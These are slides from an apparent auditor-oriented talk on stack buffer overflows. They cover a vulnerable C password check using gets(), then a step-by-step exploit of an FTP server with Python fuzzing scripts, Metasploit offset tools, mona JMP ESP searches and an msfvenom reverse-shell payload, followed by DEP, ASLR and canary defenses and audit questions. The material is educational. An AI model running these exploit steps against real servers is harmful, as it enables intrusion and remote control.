Isaca_buffer_overflowsx - Netsec mt:. Online Security and

Download Report

Transcript Isaca_buffer_overflowsx - Netsec mt:. Online Security and 

Buffer Overflow Vulnerabilities
Christian Bajada
BSc, MSc, OSCP, CISA
[1 benjaflynn]
Significance?
•
•
•
•
Morris Worm (1988) fingerd
Code Red Worm (2001) IIS 5.0
SQL Slammer (2003) SQL Server 2000
Today:
[2 Smabs Sputzer]
Is Patch Management
enough?
• Yes – for mainstream Operating
Systems and software
• No – for your legacy systems and
software you create
[3 Theen]
Compliance
• PCI
• PADSS:
• ISO 27001: “Technical vulnerability
management”
• MGA: Safeguarding of data,
applications etc.
[4 Andy Wilson]
What are buffer overflow
vulnerabilities?
1
2
3
Really? Show me
• Exploit Demo
What can we do about this?
• Protection mechanisms
[5 Cross-stitch ninja]
1996
• "Smashing the Stack for Fun and Profit" by
Aleph One. (see references for hyperlink)
• Buffer overflow vulnerabilities skyrocketed
[6 A.Donate]
Remote Code Execution
• An attacker can run a few commands on your
server
• Create new users
• Alter system configuration
• Copy over any interesting files
• …attackers just love this ability to execute
commands
[7 M.E.Scott]
How?
Sending more data to a vulnerable program than
intended for by developer.
…
Sloppy Programming (no bounds checking)
[8 H.Adam]
Analogy
Next
I borrow
€50 from
tellsto
me
his
My
ledger
later reminds
me Isomeone
have to paywho
1 million
Joseph
name is “Joseph
Borg_______1000000”
Borg_______
is paid
back
I borrowDebt
€1500
from
Joseph Borg
Creditor List
Name
Amount
Owing
Joseph Borg_______1000000
Borg
1500
0
50
[9 401(K) 2012 ]
Vulnerable Application
01 int main(void)
02 {
03
char userinput[15];
04
int pass = 0;
05
06
printf("\n Enter the password : ");
07
gets(userinput);
08
09
if(strcmp(userinput, "malta2016") !=0 ) //if userinput does not match
10
{
11
printf ("\n\n Wrong Password!");
12
}
13
else
14
{
15
printf ("\n\n Correct Password! :-) ");
16
pass = 1;
17
}
18
19
if(pass != 0) //if pass is not 0 i.e. if user entered correct password
20
{
21
/* Give access to user*/
22
printf ("\n USER IS Authenticated! Restricted section \n");
23
}
28
return 0;
29 }
[10 Nasa Goddard]
Take 2 Vulnerable Application
01 int main(void)
02 {
03
char userinput[15];
04
int pass = 0;
05
06
printf("\n Enter the password : ");
07
gets(userinput);
08
09
if(strcmp(userinput, "malta2016") !=0 ) //if userinput does not match
10
{
11
printf ("\n\n Wrong Password!");
12
}
13
else
14
{
15
printf ("\n\n Correct Password! :-) ");
16
pass = 1;
17
}
18
19
if(pass > 0)
20
{
21
/* Give access to user*/
22
printf ("\n USER IS Authenticated! Restricted section \n");
23
}
28
return 0;
29 }
Overflow to
other variable
region
Hence the
“smashing the
stack reference”
[11]
Compilation and memory addresses
01 int main(void)
02 {
03
char userinput[15];
04
int pass = 0;
05
06
printf("\n Enter the password : ");
07
gets(userinput);
08
09
if(strcmp(userinput, "malta2016") !=0 ) 10
{
11
printf ("\n\n Wrong Password!");
12
}
13
else
14
{
15
printf ("\n\n Correct Password! :-) ");
16
pass = 1;
17
}
18
19
if(pass > 0)
20
{
22
printf ("\n USER IS Authenticated! Restricted
section \n");
23
}
28
return 0;
29 }
Text (code) memory addresses are
allocated at compile time.
[12]
Memory Regions (simplified)
[17]
Stack Memory Analogy
The arrows represent each function
Discuss
remembering
where it left off
Solutions()
AttendMeeting
WeAddSugar
keep
track
of
what
we were doing in
ReplyToEmails()
()
()
order to identify what our next task is.
main
MixCerealWith
Make Tea()
Milk()
WorkOn
CheckEmail()
Drive()
Projects()
Sleep8hours()
Shower()
Cook()
HaveBreakfast()
Work()
Eat&Sleep()
end
[13]
Return Pointer
The return pointer stores the
instruction what to do next after
this function terminates.
What happens if we are in control
to overwrite the return pointer
with any value?
We gain control of program
execution!
[14]
Return Pointer (ii)
[15]
Return Pointer (iii)
Cannot access
memory at
0x41414141! (AAAA)
[16]
Return Pointer (iv)
[17]
.text and Stack (simplified)
Usually program
instructions are
executed from
this region called
.text
But if we can inject
executable code here, we
may get the CPU to jump
to it and execute it
2
1
[17]
FTP Server Demo
Objectives
1. Get Shell access
2. Get secret.txt file in C:
[18]
Steps to Follow to exploit remote
service
0. Set a similar test environment of the server we
are trying to exploit.
1. Check if server is ‘crashable’ by sending more
data than we can.
2. Identify which exact bytes are filling EIP causing
the program to crash.
3. Fill the return address with an address that points
to our buffer
4. Replace our meaningless buffer with malicious
code.
5. Exploit!
[19]
0. Setting up
• Show VM… and running FTP server.
[20]
1. Fuzzing program
01 import socket
02 buffer = 'A' * 100
03 while True:
04
print "Fuzzing with length: " + str(len(buffer))
05
s = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
06
s.connect(('192.168.1.16',21)) #HARDCODED IP
ADDRESS.
07
data = s.recv(1024)
08
s.send('USER ' + buffer + '\r\n')
09
data = s.recv(1024)
10
s.send('PASS anonymous' + '\r\n')
11
data = s.recv(1024)
12
s.close()
13
buffer = buffer + 'A' *100
Outcome: We know FTP Server crashes at
300+ bytes.
[20]
2. Identifying bytes going in Return Pointer
2.1 Generate a unique string which will help us
identify the exact location:
/usr/share/metasploit-framework/tools/pattern_create.rb 300
[21]
2. Identifying bytes going in Return Pointer
2.2 Send the unique string and check where
program crashes:
01 import socket
02 buf =
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8
Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1…
03 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
04 print "Sending unique string buffer... "
05 s.connect(('192.168.1.16',21))
06 data = s.recv(1024)
07 s.send('USER ' + buf + '\r\n')
08 s.close()
[22]
2. Identifying bytes going in Return Pointer
2.3 Check in debugger where program crashes.
Use script to determine exact location of bytes:
/usr/share/metasploit-framework/tools/pattern_offset.rb
Outcome: Return pointer bytes are at 231-234
[23]
2.4 Verifying buffer location
01 import socket
02 buffer = 'A' * 230 + 'B' * 4 + 'C' *
100
03 s = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
04 print "Sending buffer... "
05 s.connect(('192.168.1.16',21))
06 data = s.recv(1024)
07 s.send('USER ' + buffer + '\r\n')
08 s.close()
[24]
3. Fill the return address with a memory
address that points to our buffer
The ESP register points exactly at the start of our Cs.
We should find a JMP ESP (Jump to ESP register)
instruction.
[25]
3. Finding JMP ESP return address (ii)
The mona extension: “!mona modules” lists all
the modules loaded with the exe, and
protection mechanisms.
!mona find -s "\xff\xe4" -m User32.dll
The columns refer to protection
mechanisms. Find the one that has the
least!
[26]
3. Finding JMP ESP return address (iii)
- JMP ESP has the hex equivalent of FF E4
1. !mona find -s "\xff\xe4" –m ftpserver.exe
Remember, a process also loads operating system DLLs.
2. So if none found, try the OS dlls e.g:
“!mona modules” to list the loaded modules, and
!mona find -s "\xff\xe4" –m user32.dll
3. Choose one which has the least protection
mechanisms.
[27]
Communication Flow during exploit
1 ATTACKER SENDS EXPLOIT
Firewall blocks
inbound traffic but
allows outbound
3. VICTIM OPENS CONNECTION TO ATTACKER
2. VICTIM
RUNS
EXPLOIT
[28]
4. Replace our meaningless buffer with
malicious code.
msfvenom -p windows/shell_reverse_tcp LPORT=80 LHOST=192.168.1.15 -e x86/shikata_ga_nai -b
"\x00\x0d\x0a" -f python
01 import socket
02
03 buf = ""
04 buf += "\xda\xd0\xba\x29\x20\xbb\x3e\xd9\x74\x24\xf4\x5e\x29"
05 buf += "\xc9\xb1\x4f\x83\xee\xfc\x31\x56\x15\x03\x56\x15\xcb"
06 ...
07 ....
08 buf += "\xc6\xd5\xa6\x7d\xa3\xd0\xe3\x39\x58\xa9\x7c\xac\x5e"
09 buf += "\x1e\x7c\xe5"
10
11 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
12 buffer = 'A' * 230 +'\x53\x93\x42\x7e' + '\x90'*20 + buf + 'C' *400
13 print "Sending evil buffer... "
14 s.connect(('192.168.1.16',21))
15 data = s.recv(1024)
16 s.send('USER ' + buffer + '\r\n')
17 s.close()
[29]
Protection Mechanisms
[30 Phil Roeder]
DEP (Data Execution Prevention)
• Marks the process stack as Non eXecutable
(NX)
• You can have variables, but not execute
process instructions.
• Requires NX CPU bit (all modern CPU have
this)
• Windows: Started with XP SP2, 2003 SP1.
[31]
Verifying DEP on Windows
• wmic OS Get DataExecutionPrevention_Available
• wmic OS Get DataExecutionPrevention_SupportPolicy
[32]
DataExecutionPreve
ntion_SupportPolicy
property value
Policy Level
Description
2
OptIn (default
configuration)
Only Windows
system components
and services have
DEP applied
3
OptOut
DEP is enabled for all
processes.
Administrators can
manually create a list
of specific
applications which
do not have DEP
applied
1
AlwaysOn
DEP is enabled for all
processes
0
AlwaysOff
DEP is not enabled
for any processes
https://support.microsoft.com/en-us/kb/912923
[33]
[34]
Verifying DEP on Linux
• Debian based: dmesg | grep NX
Value should be greater than 0
[35]
Verifying DEP on Linux (ii)
• CentOS/RHEL based:
sysctl kernel.exec-shield
• 1 means enabled.
[36]
ASLR (Address Space Layout
Randomization
• Randomizes operating system libraries/dlls so
that you can’t use their JMP ESP or any other
addresses
The existence of a single area in memory not
randomized completely defeats the purpose of
ASLR.
[37]
Verifying ASLR on Linux
cat /proc/sys/kernel/randomize_va_space
0 – No randomization. Everything is static.
1 – Conservative randomization. Shared libraries,
stack, mmap(), VDSO and heap are randomized.
2 – Full randomization
[38]
Verifying ASLR on Linux
• Readelf –h <executablepath> | grep DYN
• If the executable is compiled for PIE (position
independent executable) it is able to randomize
it’s base.
[39]
Verifying ASLR processes on Windows
[40]
Verifying ASLR processes on Windows
Pefinder.exe <dll> -v
There is no legitimate way to disable ASLR (on
ASLR compiled exes) on a Windows machine
(Vista and more recent)
[41]
Canaries
A canary is a value which is put on the stack
memory at a particular location.
Later on the same memory location is
checked for the value previously written.
If the value is not present it means that
something such as an overflow has changed
the canary value indicating corruption.
[42]
Using Safe Functions
• Using Safe functions
Security Development Lifecycle (SDL) Banned
Function Calls
• https://msdn.microsoft.com/enus/library/bb288454.aspx
[43]
Others…
• Fortify source – checks if binary was compiled
with buffer overflow protection (bounds
checking).
• Relocation Read-only (RELRO) – Hardens the
data section avoiding execution.
• SafeSEH -
[44]
All the protection mechanisms have
their weaknesses and can be
bypassed, but they do make it more
difficult for an attacker.
[45]
5 Questions IS Auditors should ask
1. Is the application written in a language known
vulnerable to buffer overflows? (C, C++, Fortran
or Assembly)
2. Is the application internet facing?
3. Is the application running with high privileges?
(root/System/Administrator)
4. Are developers trained in secure coding, and
know they should avoid vulnerable functions?
5. Do system architects/owners use (and know)
about any protection mechanisms?
[46]
5 Substantive Tests
1. Evidence of testing which includes bounds
checks?
2. Source code check, searching for vulnerble
function such as strcpy or gets.
3. How are programs compiled? Any evidence of
compiler flags indicating buffer overflow
protection?
4. Check that the operating system and application
have DEP, ASLR enabled.
5. Evidence of a patch management programme
being followed?
[47]
Questions?
• Find the slides and samples on my website:
http://www.netsec.com.mt/
[48]
References
•
MGA Compliance Audit Manual http://www.mga.org.mt/wp-content/uploads/COMPLIANCE-AUDITMANUAL1_scm.pdf
•
PCI 3.1 Requirements and Security Assessment Procedures
https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-1.pdf
•
PA DSS 3.1 Requirments and Security Assessment Procedures
https://www.pcisecuritystandards.org/documents/PA-DSS_v3-1.pdf
•
Smashing the Stack for Fun and Profit" by Aleph One.
http://insecure.org/stf/smashstack.html
•
https://developer.apple.com/library/watchos/documentation/Security/Conceptual/SecureCodingGuide/Articles/B
ufferOverflows.html#//apple_ref/doc/uid/TP40002577-SW1
•
How to determine that hardware DEP is available and configured on your computer.
https://support.microsoft.com/en-us/kb/912923
•
How Effective is ASLR on Linux Systems?
http://securityetalii.es/2013/02/03/how-effective-is-aslr-on-linux-systems/
•
Finding non-ASLR or DEP modules
https://www.scriptjunkie.us/2011/03/finding-non-aslr-or-dep-modules/
[50]
Background Photo Credits/Attributions
[1] Photo credit: benjaflynn via Foter.com / CC BY
[2] Photo credit: Smabs Sputzer via Foter.com / CC BY
[3] Photo credit: Theen ... via Foter.com / CC BY-NC-SA
[4] Photo credit: Andy Wilson via Foter.com / CC BY-NC-SA
[5] Photo credit: Cross-stitch ninja via Foter.com / CC BY-NC-ND
[6] Photo credit: arturodonate via Foter.com / CC BY
[7] Photo credit: scanlime via Foter.com / CC BY-SA
[8] Photo credit: H.Adam via Foter.com / CC BY
[9] Photo credit: 401(K) 2013 via Foter.com / CC BY-SA
[10-29] Photo credit: NASA Goddard Photo and Video via Foter.com / CC BY
[30-55] Photo credit: Phil Roeder
[49]